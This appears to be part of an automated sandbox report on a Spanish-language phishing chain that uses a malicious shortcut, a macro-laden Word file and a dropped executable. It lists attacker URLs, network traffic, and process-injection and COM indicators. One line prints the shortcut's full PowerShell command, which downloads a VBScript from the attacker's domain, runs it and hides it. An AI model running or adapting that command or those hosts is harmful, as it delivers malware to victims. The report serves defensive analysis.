                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthB
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsg
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgz
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsd
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdf
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfd
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdf
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgW
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdE
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdy3
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdyt.CMD;.VBS;.O
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythOFILE=C:
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgData=C:
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgr
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsVBE;.JS
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsd:
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdt
                        Source: wscript.exe, wscript.exe, 0000000A.00000003.1470927034.000002943054C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489808249.000002942ED54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtg
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgd
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgds
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/x
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xs
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsd
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdg
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfTTo
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfy??o
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfyk
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykg
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgf
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfu#
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuk
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfukt
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktg
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgf
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfj
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfju
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjuf
                        Source: wscript.exe, 0000000A.00000002.1489654794.000002942EB67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrk
                        Source: wscript.exe, 0000000A.00000002.1489654794.000002942EB67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkuEE
                        Source: wscript.exe, 0000000A.00000002.1489654794.000002942EB67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkuj.
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1470416027.000002942EBE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1470130563.000002942EBE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1485175841.0000029430A0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1470416027.000002942EBC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkujg
                        Source: wscript.exe, 0000000A.00000002.1489654794.000002942EB67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrssl
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdiio
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdgh~~o
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgles
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhi
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsp
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsq
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsj.dll
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghppj
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryl~
                        Source: powershell.exe, 00000001.00000002.1390837542.000001BD2B396000.00000004.00000020.00020000.00000000.sdmp, TRANSFERENCIA COMPROBANTES.lnkString found in binary or memory: https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf
                        Source: wscript.exe, 0000000A.00000003.1467671580.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1491729771.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473511321.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1477018602.0000029430A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com:443/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufr
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.comHELL32.dll$
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                        Source: unknownHTTPS traffic detected: 94.156.167.57:443 -> 192.168.2.7:49699 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 94.156.167.57:443 -> 192.168.2.7:49701 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 94.156.167.57:443 -> 192.168.2.7:49727 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 52.123.243.181:443 -> 192.168.2.7:49728 version: TLS 1.2

                        System Summary

                        barindex
                        Document contains an embedded VBA macro with suspicious strings
                        Source: .doc.10.drOLE, VBA macro line: Set WshShell = CreateObject("WScript.Shell")
                        Document contains an embedded VBA with functions possibly related to ADO stream file operations
                        Source: .doc.10.drStream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
                        Document contains an embedded VBA with functions possibly related to HTTP operations
                        Source: .doc.10.drStream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                        Document contains an embedded VBA with hexadecimal encoded strings
                        Source: .doc.10.drStream path 'Macros/VBA/ThisDocument' : found hex strings
                        Office process drops PE file
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeJump to dropped file
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exeJump to dropped file
                        Office process queries suspicious COM object (likely to drop second stage)
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: XML HTTP Request HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}\InProcServer32Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32Jump to behavior
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                        Windows shortcut file (LNK) contains suspicious command line arguments
                        Source: TRANSFERENCIA COMPROBANTES.lnkLNK file: -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E3A428 NtWriteVirtualMemory,21_2_04E3A428
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E3A580 NtSetContextThread,21_2_04E3A580
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E3A208 NtResumeThread,21_2_04E3A208
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E39CA0 NtReadVirtualMemory,21_2_04E39CA0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E3A420 NtWriteVirtualMemory,21_2_04E3A420
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E3A579 NtSetContextThread,21_2_04E3A579
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E3A200 NtResumeThread,21_2_04E3A200
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E39C98 NtReadVirtualMemory,21_2_04E39C98
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0508A580 NtSetContextThread,25_2_0508A580
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0508A428 NtWriteVirtualMemory,25_2_0508A428
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0508A208 NtResumeThread,25_2_0508A208
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_05089CA0 NtReadVirtualMemory,25_2_05089CA0
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0508A579 NtSetContextThread,25_2_0508A579
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0508A420 NtWriteVirtualMemory,25_2_0508A420
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_0508A200 NtResumeThread,25_2_0508A200
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeCode function: 25_2_05089C98 NtReadVirtualMemory,25_2_05089C98
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAACB437881_2_00007FFAACB43788
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9401021_2_00E94010
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9445821_2_00E94458
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9D89B21_2_00E9D89B
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9086921_2_00E90869
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9AA5721_2_00E9AA57
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E91B9121_2_00E91B91
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E95C3821_2_00E95C38
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9BDD821_2_00E9BDD8
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9EEE721_2_00E9EEE7
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9E2EB21_2_00E9E2EB
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9444821_2_00E94448
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E976F921_2_00E976F9
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9365121_2_00E93651
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9E73021_2_00E9E730
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9F82821_2_00E9F828
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9AAB021_2_00E9AAB0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9EBE021_2_00E9EBE0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_00E9EBD021_2_00E9EBD0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E3B5D821_2_04E3B5D8
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E3A6E021_2_04E3A6E0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E3A6D121_2_04E3A6D1
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E380D821_2_04E380D8
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E321A421_2_04E321A4
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E394A021_2_04E394A0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E394B021_2_04E394B0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E3B5C821_2_04E3B5C8
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E320F821_2_04E320F8
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E321B021_2_04E321B0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E322EC21_2_04E322EC
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E322C921_2_04E322C9
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E3238B21_2_04E3238B
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E3238C21_2_04E3238C
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E39DD021_2_04E39DD0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 21_2_04E38D7C21_2_04E38D7C
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 22_2_01270B6022_2_01270B60
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 23_2_03050B6023_2_03050B60
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 23_2_0305366823_2_03053668
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 23_2_0305203023_2_03052030
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 23_2_0305486823_2_03054868
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 23_2_03050B5323_2_03050B53
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 23_2_0305365823_2_03053658
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 24_2_04CF0B6024_2_04CF0B60
